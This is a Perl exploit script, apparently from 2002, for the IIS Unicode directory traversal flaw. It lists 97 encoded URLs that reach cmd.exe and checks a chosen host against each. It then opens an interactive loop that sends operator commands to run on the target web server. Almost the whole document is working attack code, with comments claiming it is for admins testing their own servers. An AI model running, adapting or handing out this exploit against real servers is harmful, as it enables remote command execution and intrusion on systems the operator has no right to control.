IIS Scanner (By: jingoBD)

1. #!/usr/bin/perl -w
2. #
3. # IIS Scan 2002 By Thomas O'Connor edited version of Unicode Shell By B-Root.
4. # IIS unicode strings to exploit IIS web servers.
5. # First tries to get IIS Server string.
6. # Scans for usable Unicode URL in many different ways.
7. # Then allows choice of which URL to use including an URL of
8. # your own design eg. After copying cmd.exe to /scripts.
9. # Commands are executed via your choice of URL on the target
10. # server.
11. # URL can be changed at anytime by typing URL.
12. # The Webserver can be re-SCANed at anytime by typing SCAN.
13. # Program can be QUIT at anytime by typing QUIT.
14. # HELP shows this.
15. # Have Fun Tom ( Vline of irc.dal.net #theboxnetwork ).
16.  
17.  
18. use strict;
19. use IO::Socket;
20.  
21. # Globals Go Here.
22. my $host;       # Host being probed.
23. my $port;       # Webserver port.
24. my $command;        # Command to issue.
25. my $url;        # URL being used.
26. my @results;        # Results from server.
27. my $probe;      # Whether to display output.
28. my @U;          # Unicode URLS.
29.  
30. # URLS - Feel free to add here I did ;) tom.
31. # $U[0] always used for custom URL.
32. $U[1] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
33. $U[2] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
34. $U[3] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
35. $U[4] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
36. $U[5] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
37. $U[6] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
38. $U[7] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
39. $U[8] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
40. $U[9] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
41. $U[10] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
42. $U[11] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
43. $U[12] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
44. $U[13] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
45. $U[14] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+";
46. $U[15] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
47. $U[16] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
48. $U[17] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
49. $U[18] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
50. $U[19] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
51. $U[20] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
52. $U[21] = "/MSADC/root.exe?/c+dir";
53. $U[22] = "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
54. $U[23] = "/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
55. $U[24] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
56. $U[25] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
57. $U[26] = "/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
58. $U[27] = "/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
59. $U[28] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
60. $U[29] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
61. $U[30] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
62. $U[31] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir";
63. $U[32] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir";
64. $U[33] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir";
65. $U[34] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir";
66. $U[35] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
67. $U[36] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
68. $U[37] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir";
69. $U[38] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
70. $U[39] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
71. $U[40] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
72. $U[41] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
73. $U[42] = "/c/winnt/system32/cmd.exe?/c+dir";
74. $U[43] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
75. $U[44] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
76. $U[45] = "/d/winnt/system32/cmd.exe?/c+dir";
77. $U[46] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir";
78. $U[47] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
79. $U[48] = "/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
80. $U[49] = "/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
81. $U[50] = "/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
82. $U[51] = "/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
83. $U[52] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir";
84. $U[53] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir";
85. $U[54] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
86. $U[55] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir";
87. $U[56] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
88. $U[57] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
89. $U[58] = "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir";
90. $U[59] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir";
91. $U[60] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir";
92. $U[61] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir";
93. $U[62] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir";
94. $U[63] = "/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
95. $U[64] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
96. $U[65] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
97. $U[66] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
98. $U[67] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
99. $U[68] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
100. $U[69] = "/msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir";
101. $U[70] = "/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
102. $U[71] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
103. $U[72] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir";
104. $U[73] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir";
105. $U[74] = "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir";
106. $U[75] = "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir";
107. $U[76] = "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir";
108. $U[77] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir";
109. $U[78] = "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir";
110. $U[79] = "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir";
111. $U[80] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
112. $U[81] = "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir";
113. $U[82] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir";
114. $U[83] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir";
115. $U[84] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir";
116. $U[85] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir";
117. $U[86] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir";
118. $U[87] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir";
119. $U[88] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir";
120. $U[89] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir";
121. $U[90] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir";
122. $U[91] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir";
123. $U[92] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir";
124. $U[93] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
125. $U[94] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
126. $U[95] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
127. $U[96] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
128. $U[97] = "/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
129.  
130. # SUBROUTINES GO HERE.
131. &intro;
132. &scan;
133. &choose;
134. &command;
135. &exit; # Play safe with this .
136.  
137. sub intro {
138. &help;
139. &host;
140. &server;
141. sleep 3;
142. };
143.  
144. # host subroutine.
145. sub host {
146. print "\nHost : ";
147. $host=<STDIN>;
148. chomp $host;
149. if ($host eq ""){$host="localhost"};
150. print "\nPort : ";
151. $port=<STDIN>;
152. chomp $port;
153. if ($port =~/\D/ ){$port="80"};
154. if ($port eq "" ) {$port = "80"};
155. };  # end host subroutine.
156.  
157. # Server string subroutine.
158. sub server {
159. my $X;
160. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
161. print "\nChecking if the server is IIS ...";
162. $probe = "string";
163. my $output;
164. my $webserver = "something";
165. &connect;
166. for ($X=0; $X<=10; $X++){
167.     $output = $results[$X];
168.     if (defined $output){
169.     if ($output =~/IIS/){ $webserver = "iis" };
170.     };
171. };
172. if ($webserver ne "iis"){
173. print "\a\a\n\nWARNING : I DONT THINK THE SERVER IS IIS.";     
174. print "\nThis Server may not be running Micro\$oft IIS WebServer";
175. print "\nand therefore may not be exploitable using the";
176. print "\nUnicode Bug.";
177. print "\n\n\nDo You Wish To Cont ... [Y/N]";
178. my $choice = <STDIN>;
179. chomp $choice;
180. if ($choice =~/N/i) {&exit};
181.             }else{
182. print "\n\nOK ... It Seems To Be IIS.";
183.     };     
184. };  # end server subroutine.
185.  
186. # scan subroutine.
187. sub scan {
188. my $status = "not_vulnerable";
189. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
190. print "\nScanning Webserver $host on port $port ...";
191. my $loop;
192. my $output;
193. my $flag;
194. $command="dir";
195. for ($loop=1; $loop < @U; $loop++) {
196. $flag = "0";
197. $url = $U[$loop];
198. $probe = "scan";
199. &connect;
200. foreach $output (@results){
201. if ($output =~ /Directory/) {
202.                               $flag = "1";
203.                   $status = "vulnerable";
204.                   };
205.     };
206.  
207. if ($flag eq "0") {
208. print "\n$host is not vulnerable to Unicode URL Number $loop.";
209. }else{
210. print "\a\a\a\n$host IS VULNERABLE TO UNICODE URL NUMBER $loop !!!";
211.      };
212. };
213. if ($status eq "not_vulnerable"){
214.                 print "\n\nSORRY $host is NOT Vulnerable to the UNICODE Exploit.";
215.                 &exit;
216.                 };
217. }; # end scan subroutine.
218.  
219. # choose URL subroutine.
220. sub choose {
221. print "\nURL To Use [0 = Other]: ";
222. my $choice=<STDIN>;
223. chomp $choice;
224. if ($choice > @U){ &choose };
225. if ($choice =~/\D/g ){ &choose };
226. if ($choice == 0){ &other };
227. $url = $U[$choice];
228. print "\nURL: HTTP://$host$url";
229. }; # end choose URL subroutine.
230.  
231. # Other URL subroutine.
232. sub other {
233. print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
234. print "\nHTTP://$host";
235. my $other = <STDIN>;
236. chomp $other;
237. $U[0] = $other;
238. };  # end other subroutine.
239.  
240. # Command subroutine.
241. sub command {
242. while ($command !~/quit/i) {
243. print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
244. print "\nCommand :";
245. $command = <STDIN>;
246. chomp $command;
247. if ($command =~/quit/i) { &exit };
248. if ($command =~/url/i) { &choose };
249. if ($command =~/scan/i) { &scan };
250. if ($command =~/help/i) { &help };
251. $command =~ s/\s/+/g; # remove white space.
252. print "HTTP://$host$url$command";
253. $probe = "command";
254. if ($command !~/quit|url|scan|help/) {&connect};
255. };
256. &exit;
257. };  # end command subroutine.
258.  
259. # Connect subroutine.
260. sub connect {
261. my $connection = IO::Socket::INET->new (
262.                 Proto => "tcp",
263.                 PeerAddr => "$host",
264.                 PeerPort => "$port",
265.                 ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
266. $connection -> autoflush(1);
267. if ($probe =~/command|scan/){
268. print $connection "GET $url$command HTTP/1.0\r\n\r\n";
269. }elsif ($probe =~/string/) {
270. print $connection "HEAD / HTTP/1.0\r\n\r\n";
271. };
272.  
273. while ( <$connection> ) {
274.             @results = <$connection>;
275.              };
276. close $connection;
277. if ($probe eq "command"){ &output };
278. if ($probe eq "string"){ &output };
279. };  # end connect subroutine.
280.  
281. # output subroutine.
282. sub output{
283. print "\nOUTPUT FROM $host. \n\n";
284. my $display;
285. # if probe is a for server string display only first 10 lines.
286. if ($probe eq "string") {
287.             my $X;
288.             for ($X=0; $X<=10; $X++) {
289.             $display = $results[$X];
290.             if (defined $display){print "$display";};
291.             sleep 1;
292.                 };
293. # else print all server output to the screen.
294.             }else{
295.             foreach $display (@results){
296.                 print "$display";
297.                 sleep 1;
298.                 };
299.                           };
300. };  # end output subroutine.
301.  
302. # exit subroutine.
303. sub exit{
304. print "\n\n\nYou should be happy i made this for testing so your server is secure#.";
305. print "\nCya!";
306. print "\n\n\n";
307. exit;
308. };
309.  
310. # Help subroutine.
311. sub help {
312. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
313. print "\n IIS Scan 2002 by Thomas O'Connor.";
314. print "\n www.thomasoconnor.net";
315. print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
316. print "\n A Unicode HTTP exploit for IIS WebServers.";
317. print "\n";
318. print "\n First checks if the server is IIS.";
319. print "\n Scans for usable Unicode URL in 97 different ways.";
320. print "\n Then allows choice of which URL to use including an URL of";
321. print "\n your own design eg. After copying cmd.exe to /scripts.";
322. print "\n Commands are executed via your choice of URL on the target";
323. print "\n server.";
324. print "\n ";
325. print "\n URL can be changed at anytime by typing URL.";
326. print "\n The Webserver can be re-SCANed at anytime by typing SCAN.";
327. print "\n Program can be QUIT at anytime by typing QUIT.";
328. print "\n HELP prints this ... ";
329. print "\n Have Fun Tom ( Vline of irc.dal.net #theboxnetwork ). !";
330. print "\n\n\n";
331. }; # end help subroutine.
332.  
333.  
334. # Thomas O'Connors first public production #theboxnetwork irc.dal.net .
335. # I piced this together for admins to test their own IIS servers with a mass number of iis strings.
336. # IIS Scan 2002 edited version of Unicode Shell by Thomas O'Connor [[Vline of Dalnet] http://www.thomasoconnor.tk webmaster@mail.ie #theboxnetwork irc.dal.net.
337. # Once again Thanks to B-Root for his code I really just updated the iis strings.